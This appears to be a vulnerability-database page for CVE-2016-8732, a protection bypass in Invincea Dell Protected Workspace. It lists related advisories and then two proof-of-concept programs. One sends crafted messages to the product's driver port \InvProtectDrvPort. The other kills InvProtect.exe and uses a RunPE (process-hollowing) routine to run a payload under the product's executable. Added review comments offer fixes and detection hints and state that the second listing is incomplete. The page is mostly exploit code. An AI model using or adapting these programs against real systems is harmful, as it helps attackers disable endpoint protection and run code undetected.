| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2016-8732 | 8 Jul 201705:20 | – | circl | |
| CVE-2016-8732 | 24 Apr 201819:00 | – | cve | |
| CVE-2016-8732 | 24 Apr 201819:00 | – | cvelist | |
| EUVD-2016-9571 | 7 Oct 202500:30 | – | euvd | |
| CVE-2016-8732 | 24 Apr 201819:29 | – | nvd | |
| CVE-2016-8732 | 24 Apr 201819:29 | – | osv | |
| Design/Logic Flaw | 24 Apr 201819:29 | – | prion | |
| PT-2018-5053 · Dell · Invincea Dell Protected Workspace | 24 Apr 201800:00 | – | ptsecurity | |
| Invincea Dell Protected Workspace Protection Bypass | 30 Jun 201700:00 | – | talos | |
| Vulnerability Spotlight: Dell Precision Optimizer and Invincea Vulnerabilities | 30 Jun 201711:05 | – | talosblog |
--------------------------------------- payload.exe --------------------------------------------
#include "stdafx.h"
#include "Win32Project1.h"
#include <Windows.h>
#include <Fltuser.h>
#pragma comment(lib,"FltLib")
#include <fstream>
using namespace std;
#define _CRT_SECURE_NO_WARNINGS
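/// Formats a printf-style message and sends it to the debugger output
/// (OutputDebugStringA), where a debugger or a debug-output viewer can read it.
///
/// @param pszFormat printf-style format string; a null pointer is ignored.
/// @param ...       arguments consumed by the format string.
///
/// The scratch buffer is static, so the function is neither reentrant nor
/// thread-safe (the caveat the original author flagged).
void LogMessage(char* pszFormat, ...) {
    static char s_acBuf[2048];

    if (pszFormat == nullptr) {
        return;
    }

    va_list args;
    va_start(args, pszFormat);
    // Bounded formatting: the original vsprintf wrote past s_acBuf whenever the
    // expanded message exceeded 2047 characters.
    vsnprintf(s_acBuf, sizeof(s_acBuf), pszFormat, args);
    va_end(args);

    // Older CRTs do not guarantee termination on truncation; force it.
    s_acBuf[sizeof(s_acBuf) - 1] = '\0';
    OutputDebugStringA(s_acBuf);
}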
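/// Reads a whole file into a newly allocated byte buffer.
///
/// @param fileName path of the file to read (wide string).
/// @param size     receives the number of bytes read.
/// @return buffer allocated with new[]; the caller owns it and must release it
///         with delete[].
///
/// Any failure (open, size query, oversized file, short read) terminates the
/// process with a non-zero exit code. The original exited with 0, which reported
/// success to the parent, and it did not check tellg() or read() at all.
PBYTE readFile(LPWSTR fileName, PDWORD size)
{
    std::ifstream file(fileName, std::ios::binary);
    if (!file.is_open())
    {
        printf("Could no open file\n");
        exit(1);
    }

    file.seekg(0, std::ios::end);
    const std::streamoff length = file.tellg();
    file.seekg(0, std::ios::beg);

    // tellg() returns -1 on failure; stored unchecked in a DWORD that became
    // 0xFFFFFFFF and drove a ~4 GiB allocation. Files that do not fit in a DWORD
    // are rejected for the same reason.
    if (length < 0 || static_cast<unsigned long long>(length) > 0xFFFFFFFFull)
    {
        printf("Could not determine file size\n");
        exit(1);
    }
    *size = static_cast<DWORD>(length);

    PBYTE buffer = new BYTE[*size];
    if (!file.read(reinterpret_cast<char*>(buffer), static_cast<std::streamsize>(*size)))
    {
        // A short read would leave part of the buffer uninitialised.
        delete[] buffer;
        printf("Could not read file\n");
        exit(1);
    }
    return buffer;   // the ifstream closes itself when it goes out of scope
}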
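/// Writes a byte buffer to C:\tmp\outbuff.bin, replacing any existing file.
///
/// @param buff     bytes to write.
/// @param buffSize number of bytes to write from buff.
void dumpFile(PBYTE buff, DWORD buffSize)
{
    if (buff == nullptr && buffSize != 0)
    {
        return;
    }

    // Binary mode: the original opened the stream in text mode, so on Windows
    // every 0x0A byte in the buffer was written as 0x0D 0x0A and the dump no
    // longer matched the data.
    std::ofstream file("C:\\tmp\\outbuff.bin", std::ios::binary | std::ios::trunc);
    if (!file.is_open())
    {
        LogMessage("[-]Could not open dump file\n");
        return;
    }
    file.write(reinterpret_cast<const char*>(buff), static_cast<std::streamsize>(buffSize));
}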
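/// Connects to the minifilter communication port \InvProtectDrvPort, sends the
/// contents of C:\tmp\package.bin as a single message and writes the driver's
/// reply to disk through dumpFile().
///
/// Review context: the page files this listing under CVE-2016-8732, a protection
/// bypass in Invincea Dell Protected Workspace. The driver side is not shown here,
/// so which check is missing cannot be read from this code. The general defensive
/// points are that a filter communication port should only admit intended callers
/// (a restrictive security descriptor on the port plus validation in the connect
/// callback) and that every message received on it must be validated. Connections
/// to this port from unexpected processes are worth monitoring for.
void sendMessage()
{
    const DWORD outBufferLen = 0x1000;
    BYTE outBuffer[0x1000] = { 0 };
    HANDLE portHandle = NULL;
    DWORD inBufferLen = 0;
    DWORD returned = 0;
    LPCWSTR portName = L"\\InvProtectDrvPort";

    HRESULT result = FilterConnectCommunicationPort(portName, 0, 0, 0, 0, &portHandle);
    if (IS_ERROR(result))
    {
        LogMessage("[-]Problem with connection : 0x%x\n", result);
        return;
    }
    LogMessage("[+]Connection set. Ready for actions\n");

    // readFile() exits the process on failure, so inBuffer is valid from here on.
    PBYTE inBuffer = readFile(L"C:\\tmp\\package.bin", &inBufferLen);
    // %p for the pointer: the original passed it to %x, which truncates (and is
    // undefined behaviour) on 64-bit builds.
    LogMessage("inBuffer = 0x%p size : 0x%x\n", inBuffer, inBufferLen);

    result = FilterSendMessage(portHandle, inBuffer, inBufferLen, outBuffer, outBufferLen, &returned);
    if (IS_ERROR(result))
    {
        LogMessage("[-]FilterSend went wrong : 0x%x\n", result);
    }
    else
    {
        // Never trust a length reported by the other side beyond the local buffer.
        if (returned > outBufferLen)
        {
            returned = outBufferLen;
        }
        LogMessage("[+]Outbuff dumped with size : 0x%x\n", returned);
        dumpFile(outBuffer, returned);
        LogMessage("[+]Message Sent\n");
    }

    // The original leaked both the input buffer and the port handle on every path.
    delete[] inBuffer;
    CloseHandle(portHandle);
}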
/// GUI-subsystem entry point: runs sendMessage() once and exits with status 0.
/// None of the startup parameters are used.
int APIENTRY _tWinMain(_In_ HINSTANCE hInstance,
                       _In_opt_ HINSTANCE hPrevInstance,
                       _In_ LPTSTR lpCmdLine,
                       _In_ int nCmdShow)
{
    // Mark the parameters as intentionally unused.
    (void)hInstance;
    (void)hPrevInstance;
    (void)lpCmdLine;
    (void)nCmdShow;

    const int exitCode = 0;
    sendMessage();
    return exitCode;
}
--------------------------------------- payload.exe --------------------------------------------
------------------------------------------ runpe.exe ---------------------------------------------
// NOTE(review): abridged listing. The function braces are missing and the
// definitions of killProcess(), runPE() and this one-argument readFile() are not
// on the page (payload.exe's readFile takes two arguments), so this does not
// compile as shown.
int _tmain(int argc, _TCHAR* argv[])
// Path of the installed product executable.
LPWSTR src = L"C:\\Program Files\\Invincea\\Enterprise\\InvProtect.exe";
// Path the payload binary is read from; presumably the payload.exe listed above.
LPWSTR payload = L"Z:\\tmp\\payload.exe";
// Helper not shown; by its name it terminates the running InvProtect.exe process.
killProcess("InvProtect.exe");
// Helper not shown; it is given the product's executable path together with the
// payload bytes. NOTE(review): presumably the payload then runs under the
// product's process identity; confirm against the advisory. For defenders:
// unexpected termination of InvProtect.exe, or an InvProtect.exe instance whose
// in-memory image differs from the file on disk, is the signal to look for.
// A caller check based only on image name or path cannot tell the two apart.
runPE(src, readFile(payload));
return 0;
------------------------------------------ runpe.exe ---------------------------------------------